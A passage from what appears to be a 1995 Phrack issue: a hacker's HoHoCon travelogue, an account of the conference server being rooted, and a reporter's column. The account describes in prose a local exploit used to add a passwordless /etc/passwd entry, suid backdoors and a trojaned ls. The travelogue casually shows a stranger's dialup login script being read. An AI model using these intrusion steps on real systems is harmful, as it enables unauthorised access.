  11903. station?" I yell above the whine of the engine, digging my nails into
  11904. the passenger seat.  "Nope," he replies, and we suddenly veer across 4
  11905. lanes of traffic.  "Perhaps it is better this way," I think.  Life
  11906. imitates art, then you die.
  11907.  
  11908. Holistic and I find Ohms.  We queue up and wait to enter the house of
  11909. techno-funk.  "I know this place...I feel at peace," I tell a middle-age
  11910. drunken woman in front of me.  She stares back with glassy eyes and
  11911. feebly blows on her party horn.  "Yes, I know," I reply and look at
  11912. my watch.  11:55PM.  Five minutes later, I walk into Ohms.  A flyer on
  11913. the wall has a graphic depiction of a man screwing a woman with a CRT
  11914. for her head, the title "Dance to the Sounds of Machines Fucking."
  11915. Everyone begins to cheer and yell as I step through the inner doorway.
  11916. "Either it is now 1995, or I appear to have fans," I think.  Ya, right.
  11917.  
  11918. I order Holistic and I some screwdrivers.  As the waitress is pouring
  11919. the vodka, she suddenly look distracted and our glasses overflow with
  11920. booze.  Grinning at me meekly, she squirts just a dash of orange juice
  11921. in each glass and hands them too me.  "Sorry, they're a bit strong,"
  11922. she apologizes.  "No burden," I reply warmly.  "Wow, that was weird...
  11923. but bonus for us!" Holistic says as he sips his drink with a wince.
  11924. "No, that was a sign of the cow," I smirk, fingering my silver cow skull
  11925. talisman on my neck.  "You'll get used to it."
  11926.  
  11927. Ohms is filled with smoke, sweat, flashing lights, and the funkiest
  11928. techno music I have ever heard.  Wandering outside, I see someone has
  11929. set up several computers with PPP links to the net...they are attempting
  11930. to use CU-SeeMe videoconferencing software with other sites around the
  11931. world.  "Nice computer, are you responsible for this network?" I ask one
  11932. of the operators as I open the machine's PPP config file and quickly
  11933. peruse the dialup # and entire login script under the person's nose.
  11934. "Oh, I don't know how they work..I'm just playing with this Fractal
  11935. Painter thing," she replies.  "Yes, I thought so...Holistic, next round
  11936. on me..." I exclaim as we leave.
  11937.  
  11938. There are several robotic arms on the stage clutching strobe lights,
  11939. occasionally twisting around and pointing into the crowd.  Holistic,
  11940. Basil, Crimson Death, and I begin to dance with insane purpose.  Four
  11941. hours later, we are still dancing.  Holistic eventually leaves for the
  11942. hotel.  The remaining three of us dance until we have no more body
  11943. fluids to exude.  "I love you guys," Crimson Death smiles as he grabs
  11944. both me and Basil in a bearhug and kisses us on the forehead.  "Yes,
  11945. this is bliss," I reply.  Suddenly we see Rambone at the bar...he is
  11946. wide-eyed and sweating more than a human should be.  "Well, perhaps
  11947. bliss is relative," I think.  Rambone leaves the club.  Later, we find
  11948. Bill and ride safely back to the hotel.  It is 6:00AM.
  11949.  
  11950. We find Veggie and Iskra in our room.  They have been staring at
  11951. Veggie's "Hello Kitty" blinky lights and writing stories all night
  11952. long.  "Read this, it's good!  Read it NOW!" Veggie exclaims.  "If it is
  11953. good now, it will still be good in the morning...I shall sleep now," I
  11954. answer through a haze of exhaustion.  Several minutes later, my
  11955. remaining higher cortical functions shut down and I am enveloped in sleep.
  11956.  
  11957. Sunday, early afternoon
  11958. -----------------------
  11959.  
  11960. Crimson Death stops by our room to say goodbye.  "Here is my new address
  11961. and such..I've written it on this paper and folded it into an origami
  11962. bird for you," he tells me.  "Functional art...I dig it, man," I
  11963. answer and shake his hand.  The rest of the day passes lazily, until
  11964. that evening when we pile into Drunkfux's van and head for Chuck-E-Cheeze
  11965. for dinner.  "God in Heaven, they serve BEER here!" I exclaim, quickly
  11966. ordering a pint.  Several slices of pizza and glasses of beer later, we
  11967. are all playing skee ball, video games, and air hockey.  Basil is deftly
  11968. beating everyone at air hockey (including myself).  "I'm into more
  11969. intellectual games, " I grumble.  "Say Swamp Ratte', let us play a
  11970. stimulating game of 'Whack-a-Mole'."  A real thinkin' man's game, by gum...
  11971. He whips my ass.  "Damn moles, " I grumble again.
  11972.  
  11973. Many "spring echo" plastic microphones are purchased...when yelled into,
  11974. one's voice is given an echo audio-effect, and Drunkfux begins to
  11975. announce the play-by-play of the air hockey games in his best Howard
  11976. Cosell voice.  I see Damien Thorn, Carol (the journalist), and a dozen
  11977. other HoHo attendees cavorting around Chuck-E-Cheeze...yet the restaurant
  11978. has technically closed 30 minutes ago.  No one is attempting to make us
  11979. leave.  "We dominate this establishment, but it can't last forever," I
  11980. think.  Deciding it's a good time to cash in my tickets won from skee
  11981. ball, I walk over to the ticket cash-in counter.  I notice the man
  11982. behind the counter is counting them by weighing them on a scale.
  11983. "Hrmmm...I wonder if I dipped them in beer...the increased weight would
  11984. increase my.." but my thoughts are stopped short.  Too late, the
  11985. restaurant is surely closing now, and everyone is leaving.  "Next time,
  11986. muahahahaha." I plot and scheme.  The giant plastic monkey (costing 500
  11987. tickets) will surely be mine...next time.
  11988.  
  11989. Back at the hotel, I glance at a local newspaper in the lobby.  On the
  11990. front page is a story of 2 people shot and killed in Planned Parenthood
  11991. clinics in Brookline by some sick 'right-to-lifer'.  "Goddamn, that's in
  11992. my home city...Boston!", I think.  Quickly reading the story, I feel
  11993. sickened that someone could kill like that.  I entertain a brief
  11994. fantasy....me sitting in the clinic in the waiting room....me seeing the
  11995. sicko pull a rifle out of a bag and pointing it at the defenseless
  11996. receptionist....me swinging my pump-action Mossberg 500 12 gauge shotgun
  11997. out from under my long coat....and me walking six rifled deer slugs up
  11998. the scumbag's spine.  Doom on you, sucker.  Violence is nasty, but it is
  11999. a final resort sometimes.  I think how I'd have no reservations defending
  12000. another human life with deadly force.  "An armed society is a polite
  12001. society," I think, mentally quoting Robert Heinlein.  If all those clinic
  12002. workers could pack heat, people would think twice about trying to
  12003. threaten them.  People have the right to choose how they live their own
  12004. fucking lives and control their own damn bodies...they shouldn't have to
  12005. die for it.  I read how the police are planning to increase "officer
  12006. visibility" around the clinics.  "Ya sure, us poor citizens are too meek
  12007. to defend ourselves...let's let big bro' handle it..," I think.  I file
  12008. the entire incident in my mind under "yet another reason to watch your
  12009. ass and carry a big stick."
  12010.  
  12011. I go back to the room and drown my reality-dosed anger by reading the
  12012. ultra-violent comic book "Milk and Cheese" (most highly recommended..buy
  12013. it...now!).  I ponder one of Cheese's most memorable quotes: "I wish I
  12014. had a baseball bat the size of Rhode Island, so I could beat the shit
  12015. out of this stupid-ass planet."  Sometimes, yes.
  12016.  
  12017. Later that night, Rika (the Japanese correspondent) gives us a private
  12018. viewing of Torquie's video on hacking.  We all agree it is very good...a
  12019. great deal of coverage of the international scene...Germany...the
  12020. Netherlands...even a clip of someone boxing in Malaysia.  I fall asleep
  12021. feeling content.
  12022.  
  12023. Monday, *TREMENDOUS DAMAGE*
  12024. --------------------
  12025. Monday arrives like a lamb...we wake late and hang around our room.
  12026. Swamp Ratte' decides to take a shower.  "I'm just trying this concept out...
  12027. if I like it, I might do it again," he says.  After the shower, he gives
  12028. the concept a big "thumbs up" and tells us of his plans to incorporate
  12029. it into his regular personal hygiene routine.  "This shower idea could be
  12030. the Next Big Thing," he says ominously.  "Change is good...and so is
  12031. conditioner," I comment, combing the snarls out of my own hair.  We call
  12032. downstairs to check on the jacuzzi suite we had reserved for tonight.
  12033. We are curtly informed that they are all booked.  "What, you promised us,"
  12034. I gasp.  "Damn you, then we shall check out of this pit....sayonara!"
  12035. Two hours later, we receive notice that all HoHo attendees still in the
  12036. hotel are being kicked out "due to the *tremendous damage* incurred on
  12037. the hotel this past weekend."  "What Tremendous Damage??  I'll show them
  12038. tremendous damage!" Veggie vows, leaping for the door.  The rest of us
  12039. manage to convince Veggie that his plans to drive to the closest hardware
  12040. store and buy a box of crowbars and sledgehammers is probably not the
  12041. best thing to do.  "Don't worry, Veg, " I say, comforting him.  "We
  12042. shall find another jacuzzi, no doubt."
  12043.  
  12044. We pile into Drunkfux's van and search for a new hotel in the center of
  12045. the city.  On the way, we swing back into The Corner Shoppe, where
  12046. Rodney films some more of our antics amongst the dead critters.  Rambone
  12047. buys a long bullwhip (it's a hobby, he says), and Swamp Ratte' gives an
  12048. impassioned speech for the camera on the joys of authoring.  We finally
  12049. drop off Rodney at the airport and bid him farewell on his voyage back
  12050. to the Great White North.
  12051.  
  12052. The downtown Marriott ends up being our final destination.  After
  12053. visually checking out the jacuzzi and pool facilities (no jacuzzi in
  12054. the room, sigh, but a very nice public one open until 11:00PM),
  12055. Drunkfux, Basil, and I head out in search of swimwear.  Veggie, Iskra,
  12056. Swamp Ratte', and Rambone remain in the room...and eventually
  12057. head for the bar.  We return ready for aquatics.  The three of us soak
  12058. in the jacuzzi and swim in the pool, and finally we all retire to our
  12059. hotel room.  "Damn, everyone looks like beached squid...let's go out to
  12060. Emo's tonight!" I exclaim, trying to win them over.  Veggie, Iskra,
  12061. Basil, and Rambone appear dead to the world.  "Here, I have some
  12062. ephedrine left over from the other night...it's over-the-counter...and
  12063. will make your toes tap."  Reluctantly, they agree to partake.  A few
  12064. minutes later, Rambone and Veggie are wrestling on the bed, and I am
  12065. experimenting on Drunkfux with Rambone's bullwhip.  "Gosh, I think
  12066. these pills are stimulating," remarks Rambone.  "Yes, and let us not
  12067. waste it...to Emos!" I cry.  We arrive at Emos and spend the evening
  12068. playing pinball and listening to the jukebox.
  12069.  
  12070. Returning to the Marriott, we are all still wired.  "Let us watch 'The
  12071. Crow' on the tele," I suggest.  "Mayhem and Love at it's best!"  Most
  12072. agree, and I sit riveted for the entire film.  "I am morphine for a
  12073. wooden leg," I quote mentally from the original graphic novel.  That
  12074. line never got into the movie, but I think it is one of O'Barr's best.
  12075.  
  12076. Tuesday
  12077. -----------------
  12078. Not much happens...we wander the city...bid farewell to Rambone at the
  12079. airport...check out the Fringeware store at 5015 1/2 Duval Street in
  12080. Austin...and generally chill.  Erikb shows up, and Drunkfux wires the
  12081. hotel room for a video interview with him and the rest of us as we all
  12082. lounge on the two twin beds.  At one point, Drunkfux, Basil, and I are
  12083. alone in the room when I call downstairs for room service (I sometimes
  12084. have a need for funked-up potato skins, pronto).  A knock at the door...
  12085. Drunkfux answers it wearing nothing but a towel around his waist and a
  12086. towel on his head (having just showered).  Ushering in the room service
  12087. guy, I tell him "just put the tray on the table, kind servant"  I
  12088. absentmindedly push aside Rambone's coiled bullwhip.  Suddenly realizing
  12089. the potential misinterpretation of my situation, I glance behind me to
  12090. see the video camera on tripod pointed at the beds, video equipment,
  12091. monitors,  and Basil wearing her leather pants, curled up on one of the
  12092. many tousled blankets, dead asleep.  "Uh, huh....thanks...." I stammer
  12093. as I slip the guy a fiver.  I try to think of something funny to say
  12094. like "oh, we're making a DOCUMENTARY," but the glazed look in his eyes
  12095. tells me we are beyond the point of no return.  "Well, these are the
  12096. rumors that legends are made of," I think as I close the door behind him
  12097. and wolf down my skins.  They are teeming with toppings.
  12098.  
  12099. That evening, I take a late-nite swim by myself in the pool.  The water
  12100. is heated, and by swimming under a small ledge, one is able to actually
  12101. swim to the outside section of the pool under the open sky.  Steam
  12102. rises in thick curls into the crisp night air, and as I float on my back
  12103. I am able to see the stars.  Never have I felt so relaxed.  "Like an
  12104. amoeba in the primordial soup, I live in the gutter yet strive for the
  12105. stars," I paraphrase softly to myself.  Only the stars hear me.
  12106.  
  12107. Wednesday (last day, YES, we EVENTUALLY go back home)
  12108. -------------------
  12109.  
  12110. Waking at the ungodly hour of 5AM, we make our early flight back to
  12111. Boston.  Swamp Ratte' and I sit in the hotel lobby waiting for our shuttle
  12112. to the airport.
  12113.  
  12114. "I'm going to write about this HoHoCon again...we can put it in
  12115. cDc #300," I tell him.
  12116.  
  12117. "Cool," he replies.  "What's it going to be like?"
  12118.  
  12119. "I dunno...the same as last time..maybe I'll mix in some weird dream
  12120. sequences."
  12121.  
  12122. "How about the cDc members fighting the Power Rangers and whippin' their
  12123. sorry asses?"
  12124.  
  12125. "Yeah, that sounds surreal enough!"
  12126.  
  12127. We make our goodbyes, and on the way to the airport the shuttle bus
  12128. driver from the hotel asks us "so are you with the team?"
  12129.  
  12130. "Uh, what team?"
  12131.  
  12132. "You know...the Power Rangers team...the ones putting on the show...they
  12133. are staying in our hotel.  I thought you were with them.  They're actors
  12134. putting on a live Power Rangers show across the country."
  12135.  
  12136. "No, no, we're not with them.  Please leave us alone."
  12137.  
  12138. My mind is pulled apart by this lattice of coincidence.  I decide to leave
  12139. the dream sequence out of my phile.  This, Veggie, THIS...is a sign.
  12140.  
  12141. I don't talk to the others much during the flight home.  Perhaps it is
  12142. because I know the adventure is over and I am saddened slightly.
  12143. Perhaps I am merely tired.  Most probably, it is a combination of the
  12144. two.  I quickly depart from the airport and without goodbyes grab a cab
  12145. for the L0pht.  I spend that evening alone at the L0pht, surrounded by
  12146. Machines of Loving Grace and the solitude of blinking electronic devices...
  12147. I am a bit happier.
  12148.  
  12149. Woop de doe, dat's the show.
  12150.  
  12151. Count Zero *cDc*
  12152.  
  12153. ***
  12154.                               ==Phrack Magazine==
  12155.  
  12156.                  Volume Six, Issue Forty-Seven, File 12 of 22
  12157.  
  12158.                                 HoHoCon Miscellany
  12159.  
  12160. -----------------------------------------------------------------------------
  12161.  
  12162.                                 "HERTz vs Y"
  12163.                                    By Loq
  12164.  
  12165.   (for the uninformed, HERTz is the Hohocon Emergency
  12166.    Response Team, born to deal with pussy (err posse)-like
  12167.    hackers on the net)
  12168.  
  12169.  
  12170. OK, here it is...The complete story about hohocon.org, or at least as much as
  12171. I can piece together...I will try to restrict myself to hohocon.org
  12172. information, as I sure plenty of people have their own comments on what
  12173. happened at h0h0.
  12174.  
  12175. I arrived at hohocon Friday evening, and there was nobody around.  After
  12176. phoning fool's VMB, I headed up to room 518, the computer room, to see
  12177. what was up.  f0t0n, MiCRO^[[, fool and other people were scattered throughout
  12178. the room were supposedly working on getting the system up, but they were
  12179. having some "routing" problem...Hmm...  Nevertheless, they finally got it up
  12180. a short time later, working reasonably well.
  12181.  
  12182. hohocon.org consisted of a mass of computer equipment all kludged together,
  12183. which nevertheless worked remarkably well.  There was the main user machine,
  12184. hohocon.org, which handled all the user logins, the (supposedly dual) 28.8k PPP
  12185. gateway machine, photon.hohocon.org, the terminal server, oki900.hohocon.org,
  12186. and then micro^[['s box, lie.hohocon.org (lie didn't allow logins to most
  12187. people).  Additionally, a last minute machine was added onto the network as
  12188. sadie.hohocon.org.  That machine was graciously provided by mwe, a dfw.net
  12189. type who fool had hit up for terminal and had shown up with a mysterious
  12190. overclocked '66 with a shitload of neat stuff including multimedia
  12191. capabilities.  He also brought us several "classic" (some call them ancient =)
  12192. terminals that people were able to use to login.
  12193.  
  12194. At some point, dfx showed up and made use of America's capitalistic system by
  12195. offering various warez for sale, consisting mostly of those nifty red-type
  12196. armbands to let people in to the main event...he pointed his camera at
  12197. the systems..and then left.  he's tooo uber for us...
  12198.  
  12199. Friday night, everything was calm...Micro^[[, myself, and several other
  12200. people started working on bouncing between sites on the net...Several
  12201. people donated accounts to use for this task, and we ended up with a nice
  12202. list, until we hit utexas.edu, when the whole thing came to a screeching
  12203. halt...Must say something about University of Texas at Austin networking, eh?
  12204. Not wanting to escape through tons of telnets just to kill the final one
  12205. that went through utexas, we just killed the whole thing and decided that
  12206. we would do it the next day (although we never did get around to it again...
  12207. oh well)... For those interested, here is a list of some of the sites we were
  12208. able to bounce through:
  12209.  
  12210.  usis.com  (Houston, Texas)
  12211.  bell.cac.psu.edu  (State College, Pennsylvania)
  12212.  pip.shsu.edu  (Huntsville, Texas)
  12213.  dfw.net  (Dallas, Texas)
  12214.  deepthought.armory.com  (San Jose, California)
  12215.  falcon.cc.ukans.edu  (Lawrence, Kansas)
  12216.  dunx1.ocs.drexel.edu  (Philidelphia, Pennsylvania)
  12217.  solix.fiu.edu  (Miami, Florida)
  12218.  thetics.europa.com  (Portland, Oregon)
  12219.  yogi.utsa.edu  (San Antonio, Texas)
  12220.  thepoint.com  (Sellersburg, Indiana)
  12221.  aladdin.dataflux.bc.ca  (British Columbia, Canada)
  12222.  itesocci.gdl.iteso.mx  (Guadalajara, Jalisco, Mexico)
  12223.  tamvm1.tamu.edu  (College Station, Texas)
  12224.  Joyce-Perkins.tenet.edu (Austin, Texas)
  12225.  earth.cs.utexas.edu (Austin, Texas)
  12226.  
  12227. I left Friday night around 2 am because I had to work at 8 :(...I will
  12228. never do THAT again...Nothing very eventful happened in the computer room,
  12229. several people wandered by, ophie refused to say hi to me (j/k ophie)
  12230. and plenty of jokes and stories were passed around...
  12231.  
  12232. Saturday nite was when all the fun happened on the net.  fool decided it
  12233. would be a great idea to let everyone have accounts, and we finally got up to
  12234. about a 60 line password file...Much of this traffic was over a 28.8k
  12235. slip, which worked its way down to about 10bps by the time everyone started
  12236. (ab)using it, not to mention the wonderful speed-decreasing/error-overcoming
  12237. resolution tendencies of the v.fc protocol, which left us a bit...uhh...
  12238. llllaaaaaaaaaggggggggggggeeeeeeeeddddddd.  This was eventually switched down
  12239. to 14.4k after photon realized the problems the v.fc was causing.
  12240.  
  12241. The next problem was probably very predictable, apparently to everyone except
  12242. for one "fool" who broke down and decided to give y an account.  Everyone
  12243. familiar with y (Y-WiNDoZE), knows his general habits around systems,
  12244. and hohocon.org was no exception(ok,ok, so it wasn't completely fool's fault...
  12245. Still...:)
  12246.  
  12247. Apparently y next let x login under his account to look around.  The details
  12248. are a little sketchy, but the first thing X did was look around,
  12249. check out the password file, check out the remote hosts, went on irc for
  12250. a bit, and then he began his real attack.  He ran pico and suddenly there
  12251. was a copy of 8lgm's lprcp in his directory (presumably he ascii uploaded
  12252. it into the editor) with the name 'posse'...hmmm... How ingenious (bah)...He
  12253. then proceeded to copy the password file to his own directory, add a WWW
  12254. account, password bin, and use lprcp to put it back in /etc/passwd. (copies of
  12255. his .bash_history should be available on fool's ftp site by the time you read
  12256. this...see below)
  12257.  
  12258. DjRen and I, in the meantime, were out of the room having a small party for
  12259. ourselves, so I didn't get a chance to see all this happening.  Apparently
  12260. nobody discovered it until y started wall'ing message about his eliteness
  12261. and also started bragging to everyone on irc about it.  When Dj and I returned,
  12262. we discovered that X had managed to an account for himself on the system.
  12263. X installed his own backdoors into the system and started playing
  12264. around.  At this point, I wasn't really fully aware of what was going on
  12265. because of the buzz I had from that New-Years-Day bottle of champagne
  12266. graciously delivered to us by an interesting Australian writer at the
  12267. conference.
  12268.  
  12269. Finally, Dj and I returned to the computer room, where I sat down at a terminal
  12270. to IRC a little, and I heard a big commotion about how y had hacked root :)
  12271. About the same time, y was on irc attempting to play netgod because he hacked
  12272. hohocon.org :)
  12273.  
  12274. Apparently even Mike got access to the system at one point, but it is not
  12275. clear if he did anything once he was there.  The people sitting at the
  12276. hohocon.org consoles then began a massive scramble to kick them out of the
  12277. system.   Several times they were killed, but Y and X kept coming back.
  12278. fool managed to find some of the accounts they had created, and I managed to
  12279. hear the root password from among the commotion and I logged in to kill inetd
  12280. keep them from being able to connect in.  I then proceeded to do a find for
  12281. all the suid programs, where I found a couple of x and y's backdoors (the
  12282. oh-so-elite /usr/bin/time sure had me ph00led, y :)
  12283.  
  12284. After I removed the backdoors I could find, I looked at /etc/motd, and noticed
  12285. y's message:
  12286. ================================================
  12287. Spock rules more than anyone
  12288.  
  12289. WE SWEAR
  12290.  
  12291.  
  12292. WELCOME SOUTH EASTERN POSSE TO HOHOCON!@#$
  12293. ================================================
  12294. I don't think I really have to make any comment about this message, it is
  12295. clearly self-explanatory :)
  12296.  
  12297. Thinking I could be elite too, I replaced his message with
  12298. ================================================
  12299.  
  12300.  
  12301. Loq has defeated X and Y :)
  12302.  
  12303.  
  12304. ================================================
  12305.  
  12306. Photon came in the room, and started working on getting the systems back
  12307. together... That was the conversation where we coined the phrase the
  12308. "Hohocon Emergency Response Team (HERTz)".
  12309.  
  12310. About half-an-hour later, Eclipse ambled into the room telling me to
  12311. login again...I do and somehow Proff had managed to get root access and
  12312. add a line into the motd:
  12313.  
  12314. ================================================
  12315.  
  12316.  
  12317. Loq has defeated X and Y :)
  12318. And proff has defeated Loq.
  12319.  
  12320.  
  12321. ================================================
  12322.  
  12323. I started to look around a little and suddenly it looked like all the files
  12324. were missing... When I did an ls / I realized that Proff has replaced ls
  12325. with his own  copy that wouldn't show any files :)  So for awhile, I had
  12326. to do echo *'s just to get lists of files in the directories.  At that point,
  12327. I really didn't want to play the games anymore, as it was about 2am and I had
  12328. to work at 8am that morning, but I congratulate Proff in being
  12329. able to defeat all of us that one last time :)
  12330.  
  12331. The rest of the con, with respect to the network, was pretty quiet...
  12332. For those interested, most of the hohocon logs and information will be on
  12333. fool's ftp site: ftp://dfw.net/pub/stuff/FTP/Stuff/HoHoCon
  12334.  
  12335. The list of users that were finally on Hoho was pretty large, here is a copy
  12336. of all the accounts that existed on hohocon.org at the time it went down:
  12337.  
  12338. root bin daemon adm lp sync shutdown halt mail news uucp operator games
  12339. man postmaster ftp fool yle djren mthreat shaytan loq mindV klepto btomlin
  12340. nnightmare train patriot fonenerd joe630 plexor pmetheus vampyre phlux
  12341. windjammer nocturnus phreon spock phred room202 novonarq thorn davesob
  12342. f-christ gweeds cyboboy elrond onkeld octfest tdc mwe angeli Kream ljsilver
  12343. marauder landon proff hos fool cykoma dr_x el_jefe mwesucks iceman eric
  12344. z0rphix
  12345.  
  12346.  
  12347. Other miscellaneous notes....
  12348.  
  12349. Thanks to fool for organizing as much as he did in such limited time.
  12350.  It sucks that the first hotel had to cancel and that caused
  12351.  us to lose our ISDN link...Hopefully next year I will be able
  12352.  to provide the link for you.
  12353.  
  12354. Thanks to photon for getting the PPP link up and running...it disconnected
  12355.  many times and became really slow when the load finally came down
  12356.  on it, but overall it worked extremely well with few problems.
  12357.  
  12358. Thanks to micro^[[ for the idea of trying to bounce the telnets around the
  12359.  world in the normal hacker tradition...
  12360.  
  12361. Thanks to eclipse for the interesting conversations and for giving me a
  12362.  better understanding of Proff... :)
  12363.  A small note that Eclipse discovered:
  12364.   "To Root: (slang) To have sex..."
  12365.  
  12366.  ahh...no wonder all those people sit on the net on friday nites :)
  12367.  
  12368. Thanks to Proff for the extra entertainment at the end of the nite... I
  12369.  look forward to battling you in the future :)
  12370.  
  12371. Also thanks to X and Y for the entertainment as well :)
  12372.  
  12373. Finally, thanks to both fool and eclipse for helping me review this text and
  12374.  get it somewhat accurate at least :)
  12375.  
  12376. I am intentionally leaving everyone else's names off of here because I
  12377. know I would forget someone that I met at hohocon, and I wouldn't want to
  12378. cause hurt feelings or anything :)
  12379.  
  12380. -----------------------------------------------------------------------------
  12381.  
  12382.                    Bits and Bytes Column by J. Barr
  12383.                      (From Austin Tech-Connected)
  12384.  
  12385.  
  12386. WaReZ <nOun>  1.  Stolen software available to 'elite' callers on
  12387. 'elite' bulletin boards.  2.  Pirated or cracked commercial
  12388. software.
  12389.  
  12390. HoHoCon is Austin's annual celebration of the computer
  12391. underground.  Phreaks, phracks and geeks rub shoulders with
  12392. corporate security-types, law enforcement officials, and various
  12393. and assorted cyber-authors.  It's an in thing, a cult thing, an elite
  12394. thing. In many ways it reminds me of the drug-culture of the 60's
  12395. and 70's.  It has the same mentality:  paranoia and an abiding
  12396. disdain for the keepers of law and order. But after all, HoHoCon
  12397. honors the Robin Hoods of the computer era: stealing from the
  12398. rich, powerful, and evil prince (Microsoft, IBM, Lotus, et al) and
  12399. distributing to poor dweebs under the very nose of the sherrif.
  12400. A nose, by the way, that just begs to be tweaked. That's the
  12401. romantic notion, at least.  To others there is no nobility in
  12402. computer crime.  Whether it's a case of wholesome anarchy run
  12403. amok or youthful pranksterism subverted to common criminal
  12404. mischief: warez is warez, theft is theft.
  12405.  
  12406. A month or two ago I had an email conversation with a young
  12407. man and we discovered we both ran BBS's. He asked what my
  12408. board was about and I explained that The Red Wheelbarrow)
  12409. was for 'rascals, poets, and dweebs', and that it carried echos
  12410. from FidoNet, USENET, and elsewhere.  He replied that his was
  12411. a private board, one that dealt mainly in "WaRez and 'bOts" and
  12412. closed his note with an "eVil gRin."   Not being sure what he was
  12413. talking about, I asked him to spell it out for me.  I never heard
  12414. from him again.
  12415.  
  12416. I mention this because at HoHoCon you either knew these
  12417. things or you didn't; you were part of the elite or you were not.
  12418. Like my questions to my friend the pirate board operator, my
  12419. questions at HoHoCon went unanswered.
  12420.  
  12421. The hype in various  Austin newsgroups for this year's event
  12422. talked quite a bit about the party last year.  Cyberspace
  12423. luminaries shared top billing with the mention of teenage girls
  12424. stripping for dollars in a hotel room.  I decided then and there it
  12425. was the sort of function I should cover for Tech-Connected.
  12426.  
  12427. I asked at the door for a press pass and was directed towards a
  12428. rather small redheaded kid across the room. The guard at the
  12429. door said he (the kid) was running the show.  I expected to see
  12430. lots of people I knew there, but  I only saw one. John Foster is
  12431. the man who keeps the whole world (including Tech-
  12432. Connected) up-to-date as to what boards are up and what boards
  12433. are down in Central Texas. John is about my age.  He looked
  12434. normal.  Everyone else was strange.  I saw more jewelry in
  12435. pierced noses and ears walking across that room than I normally
  12436. see in a week. Lots of leather and metal, too.  HoHoCon '94
  12437. looked like where the tire met the (info) road: a cross between
  12438. neo-punk-Harley-rennaisance and cyber-boutique. Most of the
  12439. crowd was young.  Old gray-beards  like John and I really stuck
  12440. out in the crowd.
  12441.  
  12442. I found the redheaded kid. He was selling t-shirts at the table.
  12443. Next to him an "old hand" (who must have been nearly 30) was
  12444. reciting the genesis of personal computers to a younger dweeb.
  12445. They quibbled for a second about which came first, the Altos or
  12446. the Altair, then looked up to see if anyone was listening and
  12447. smiled when they saw that I was.  I waited respectfully for the
  12448. redheaded kid to finish hawking one of his shirts, then repeated
  12449. my request for a press pass.  He just looked at me kind of funny
  12450. and said he had given some out, but only to people he knew.  I
  12451. didn't know a secret handshake or any codewords I could blurt
  12452. out to prove I was cool, so I just stood there for a moment and
  12453. thought about what to do next.
  12454.  
  12455. Perhaps a change in costume would make me cool.  Maybe then
  12456. these kids could see that I was OK.  I picked up a black one, it
  12457. read NARC across the front and on the back had a list of the top-
  12458. ten NARC boards of 1994.  Not wanting to appear ignorant, I
  12459. didn't ask what NARC stood for.  I figured it would be easy
  12460. enough to find out later, so I bought the shirt and left.
  12461.  
  12462. I returned Sunday morning, wearing my new NARC t-shirt,
  12463. certain it would give me the sort of instant-approval I hadn't had
  12464. the day before.  It didn't.   As I was poking around the empty
  12465. meeting room, a long-haired dude in lots of leather came
  12466. clunking up in heavy-heeled motorcycle boots and asked what I
  12467. was doing.  I explained I was there to do a story. That shut him
  12468. up for a second so I decided to pursue my advantage.  "Anything
  12469. exciting happen last night?" I asked.  "Nothing I can tell YOU
  12470. about, SIR" he replied, then pivoted on one of those big heels
  12471. and clunked away.
  12472.  
  12473. Browsing the tables in the meeting room I found pamphlets left
  12474. over from the previous day's activities.  There was an old
  12475. 'treasure map' of high-tech 'trash' locations in Denver. Northern
  12476. Telecom, AT&T and U.S.West locations seemed to be the focus.
  12477. There were flyers from Internet access providers (it seemed a
  12478. little like carrying coals to Newcastle, but then what do I know), a
  12479. catalog from an underground press with titles like "The Paper
  12480. Trail" (just in case you need to create a new identity for
  12481. yourself), "Fugitive: How to Run, Hide, and Survive" and
  12482. "Secrets of Methamphetamine Manufacture." Good family
  12483. reading, fer shure.
  12484.  
  12485. For the purists there were reprints of issues 1 to 91 of
  12486. "YIPL/TAP", the first phreak newsletter.  For the wannabe's like
  12487. me, there were more kewl t-shirts to be ordered.  I decided I
  12488. should have opted for the one with "Hacking for Jesus" across
  12489. the back. I appreciate the art of anthropology a little more after
  12490. trying to read the spoor left behind at HoHoCon.  It is definitely
  12491. a mixed bag.
  12492.  
  12493. To this day, I'm not certain what NARC stands for.  Someone
  12494. suggested it was any state or federal officer interested in busting
  12495. people, just like in the bad old days (or today, for that matter).
  12496. Maybe it's shorthand for aNARChist. The definition I like best
  12497. was given to me on an internet newsgroup,  alt.binary.warez.pc.
  12498. (Really, it exists right there in front of the Secret Service and
  12499. everyone.)  One reply actually had an answer. After a paragraph
  12500. or two of the requisite 'my gawd what a stupid question from a
  12501. know-nothing nerd',  the suggestion was made that it stood for
  12502. "Never At Rest Couriers."
  12503.  
  12504. I like that one because it suggests a purpose for those 'bots my
  12505. friend with the WaReZ board and the eViL gRiN mentioned in
  12506. our conversation.  Sitting in private channels on IRC servers,
  12507. 'bots could be used to store and forward pirated goods across the
  12508. internet in almost untraceable ways.  Who knows for sure?  Not
  12509. I.  One thing I'm certain of, I'm real careful what part of town I
  12510. wear my NARC t-shirt in.  I would really hate getting shot by a
  12511. confused crack-cocaine dealer who thought my shirt was the
  12512. signal his deal had gone bad.
  12513.  
  12514. Because I had been excluded from the inner circle, because I
  12515. had tried and failed to become part of the elite during HoHoCon,
  12516. it was easy for me to work myself into a morally superior position
  12517. from which to write this column.  All I had really seen were a
  12518. bunch of kids: wannabe's, cyber-groupies and counterculture
  12519. alternatives to life-as-we-know-it, celebrating the triumph of
  12520. crooks and petty thieves over legitimate big business and big
  12521. government.  But something bothered me about that safe, smug
  12522. position, and the more I thought about it the more it irked.
  12523.  
  12524. For one thing, something was missing. If they were criminals,
  12525. where was the loot?  Where were the Benz and BMW's that
  12526. should have been in the parking lot?  Where were all the fancy
  12527. wimminz that follow fast money?  Software prices are high these
  12528. days, so even if they were only getting a dime on the dollar for
  12529. their WaReZ, there should have been some real high-rollers
  12530. strutting their stuff.
  12531.  
  12532. A reformed phreaker gave me some input on this.  He said it was
  12533. about collecting a complete set, like trading baseball cards, not
  12534. about making money.  The software itself wasn't  important.
  12535. Having it in your collection was the important thing. Tagging in
  12536. cyberspace.  Making a mark by having one of everything. But
  12537. still, it's illegal.  Against the law, whether for profit or not.
  12538.  
  12539. The news background as I write this story is about Microsoft,
  12540. king of the PC software hill.  The judge reviewing the Consent
  12541. Decree negotiated between the Department of Justice and
  12542. Microsoft is angry with the lawyers from Redmond.  He tells them
  12543. that he can't believe them any longer.  They testified in
  12544. September that Microsoft did not engage in marketing
  12545. vaporware, which is an old IBM tactic of hurting the sales of a
  12546. competitor's product by promising they would have one just like
  12547. it, and better, real soon now.
  12548.  
